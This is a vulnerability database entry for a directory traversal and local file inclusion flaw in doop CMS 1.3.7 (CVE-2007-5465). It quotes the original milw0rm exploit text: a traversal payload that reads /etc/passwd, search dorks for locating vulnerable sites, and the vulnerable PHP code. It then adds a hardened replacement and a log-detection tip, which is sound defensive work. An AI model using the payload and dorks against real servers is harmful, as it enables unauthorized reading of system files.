doop CMS Unspecified Component Directory Traversal Vulnerability

Vulnerability ID: 1113801    Vulnerability type: Path traversal
Published: 2007-10-15    Updated: 2009-04-29
CVE: CVE-2007-5465    CNNVD ID: CNNVD-200710-295
Platform: PHP    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/4536
https://www.securityfocus.com/bid/26075
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200710-295
|Vulnerability details
A directory traversal vulnerability exists in doop CMS 1.3.7 and earlier versions. A remote attacker can include and execute arbitrary local files via a .. (dot dot) in the page parameter of an unspecified component.
|Vulnerability EXP
______________________________________________________
|         DOOP CMS <=1.3.7 Local File Inclusion        |
|______________________________________________________|

 ______________________________________________________
| vuln path: ?page=/../../../../../../../etc/passwd%00 |
|                                                      |
| dork: Doop CMS                                       |
| dork2: powered by Doop CMS                           |
|                                                      |       
| work only if magic_quotes_gpc are set to OFF         |
|______________________________________________________|

 ______________________________________________________
| vuln code:                                           |
| line 544:                                            |
|  if (!isset($_REQUEST['page'])){                     |
|    $_REQUEST['page']=$homepage;                      |
|    $cpage=$_REQUEST['page'];                         |
|  } else { $cpage=$_REQUEST['page']; }                |
|                                                      |
| line 646:                                            |
|  if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
|    if (file_exists("pages/".$cpage.".htm")){         |
|        include("pages/".$cpage.".htm");              |
|    }                                                 |
|    else include("pages/".$cpage.".html");            |
|   }                                                  |
|______________________________________________________|
 ______________________________________________________
| greetz to: http://vladii.wordpress.com               |
|            http://rstzone.org                        |
|            http://hackpedia.info                     |
|            SlicK & Shocker & moubik & kw3            |
|______________________________________________________|

 ______________________________________________________
|                  @vladii 2007                        |
|______________________________________________________| 

# milw0rm.com [2007-10-15]
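The root cause in the quoted code is that `$_REQUEST['page']` is concatenated into the include path unchecked, so `../` sequences and a `%00` null byte let the caller pick any file. The following hardened replacement is an added example, not doop CMS code and not from the advisory: it validates the page name against a strict allowlist pattern and confines the resolved path to the pages directory, so it does not depend on `magic_quotes_gpc` (which was removed in PHP 5.4 anyway). `PAGES_DIR` and `HOMEPAGE` are assumed names.

```php
<?php
// Added example (not doop CMS code): a hardened replacement for the
// include logic quoted in the advisory. Instead of building a path from
// $_REQUEST['page'] directly, the page name is validated against a strict
// pattern and then resolved and confined to the pages/ directory.

const PAGES_DIR = __DIR__ . '/pages';   // assumed location of the page files
const HOMEPAGE  = 'home';               // assumed default page name

/**
 * Returns the absolute path of the page file to include, or null when the
 * requested name is not a valid, existing page inside PAGES_DIR.
 */
function resolve_page(string $requested): ?string
{
    // 1. Structural allowlist: only letters, digits, '-' and '_' form a page
    //    name. This rejects '/', '..' and the null byte used in the advisory.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $requested)) {
        return null;
    }

    $base = realpath(PAGES_DIR);
    if ($base === false) {
        return null;
    }

    // 2. Try the two extensions the original code supports, in the same order.
    foreach (['.htm', '.html'] as $ext) {
        $real = realpath($base . '/' . $requested . $ext);
        // 3. Containment check: the resolved file must sit under the pages
        //    directory even if a symlink was planted there.
        if ($real !== false
            && is_file($real)
            && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0) {
            return $real;
        }
    }
    return null;
}

$cpage = (isset($_REQUEST['page']) && is_string($_REQUEST['page']))
    ? $_REQUEST['page']
    : HOMEPAGE;

$file = resolve_page($cpage);
if ($file === null) {
    http_response_code(404);   // unknown or malformed page name: never include
    echo 'Page not found';
} else {
    include $file;
}
```

For detection, a request log entry whose `page` parameter fails the same pattern (contains `/`, `..` or `%00`) is a direct indicator of an attempt against this bug.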
|Affected products
Mydoop.org doop 1.3.7
|References

Source: MILW0RM    Name: 4536    Link: http://www.milw0rm.com/exploits/4536
Source: OSVDB    Name: 37864    Link: http://osvdb.org/37864
Source: XF    Name: doop-index-file-include(37205)    Link: http://xforce.iss.net/xforce/xfdb/37205
Source: BID    Name: 26075    Link: http://www.securityfocus.com/bid/26075
Source: SECUNIA    Name: 27255    Link: http://secunia.com/advisories/27255